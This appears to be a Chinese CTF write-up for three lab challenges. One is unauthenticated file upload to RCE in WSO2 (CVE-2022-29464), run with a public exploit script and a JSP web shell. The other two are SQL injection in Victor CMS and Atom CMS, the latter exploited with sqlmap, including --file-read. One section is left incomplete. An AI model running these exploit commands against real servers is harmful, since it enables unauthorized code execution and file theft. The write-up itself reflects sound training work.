当前位置: 首页 > news >正文

春秋云境刷题1

CVE-2022-29464

靶标介绍:

WSO2文件上传漏洞(CVE-2022-29464)是Orange Tsai发现的WSO2上的严重漏洞。该漏洞是一种未经身份验证的无限制任意文件上传,允许未经身份验证的攻击者通过上传恶意JSP文件在WSO2服务器上获得RCE。

Github下载EXP,地址:https://github.com/hakivvi/CVE-2022-29464/

执行命令:python exploit.py http://123.58.236.76:38380/ abc.jsp或者在pycharm上运行

根据返回信息可判断abc.jsp已成功上传。

浏览器直接访问返回路径,即可执行任意系统命令。

shell @ http://eci-2zefnfvpsa7cleo0wubm.cloudeci1.ichunqiu.com:9445//authenticationendpoint/abc.jsp

ls

cat /flag

CVE-2022-28060

靶标介绍:

Victor CMS v1.0 /includes/login.php 存在sql注入

在登录点抓包

将数据包 粘贴到1.txt

CVE-2022-25488

靶标介绍:

Atom CMS v2.0存在sql注入漏洞在/admin/ajax/avatar.php页面

进入之后发现是Not Found页面

访问/admin/ajax/avatar.php,发现是空白页面

查看源码

删除 avatar.php 文件发现能看到整个目录 

查看其他文件得到报错信息

测试一下注入点?id=1

源码发生了变化:

?id=1'

是字符型注入

使用 SQLMap

python sqlmap.py -u "http://eci-2zehclipdg0vl24ixud6.cloudeci1.ichunqiu.com/admin/ajax/avatar.php?id=1"

python sqlmap.py -u "http://eci-2zehclipdg0vl24ixud6.cloudeci1.ichunqiu.com/admin/ajax/avatar.php?id=1" -D "mysql" --file-read "/flag"

相关文章:

  • 从0到1入门AOP
  • Spring中的循环依赖问题是什么?
  • 企业级 GitLab 开发流程全解
  • 一文读懂 EtherNET/IP 转 Modbus RTU 网关
  • 观察者模式详解:用 Qt 信号与槽机制深入理解
  • 博客图床 VsCode + PigGo + 阿里云OSS
  • 传统会议室接入神旗视讯-2 Android会议室大屏设备 (Maxhub, Newline, TCL等)
  • GraphCube、Spark和深度学习技术赋能快消行业关键运营环节
  • HTML CSS
  • Springdoc配置参数详解
  • WPS表格导入CSV文件(适合处理数据库导出数据)
  • html5表格实战-跨行跨列
  • 【分布式锁通关指南 08】源码剖析redisson可重入锁之释放及阻塞与非阻塞获取
  • 系统分析师论文《论业务流程分析方法及其应用》
  • Linux的Shell编程
  • 【一起学Rust | Tauri2.0框架】基于 Rust 与 Tauri 2.0 框架实现生物识别(指纹识别)应用
  • Vala编程语言教程-语法和注释
  • Channel-wise Knowledge Distillation for Dense Prediction论文阅读和
  • 【css酷炫效果】纯CSS实现粒子旋转动画
  • NFC 碰一碰发视频源码搭建,支持OEM
  • “爱鸟周”为何不能像FI和花展那样“市区联动”
  • 首批证券公司科创债来了!拟发行规模超160亿元
  • 山寨“小米”智能马桶、花洒销售额过亿,被判赔3500万元
  • 司法部:民营经济促进法明确禁止违规异地执法、利用行政或者刑事手段违法干预经济纠纷
  • 美联储主席:关税“远超预期”,美联储实现目标的进程或被推迟至明年
  • 当Z世代与传统戏曲在春日校园相遇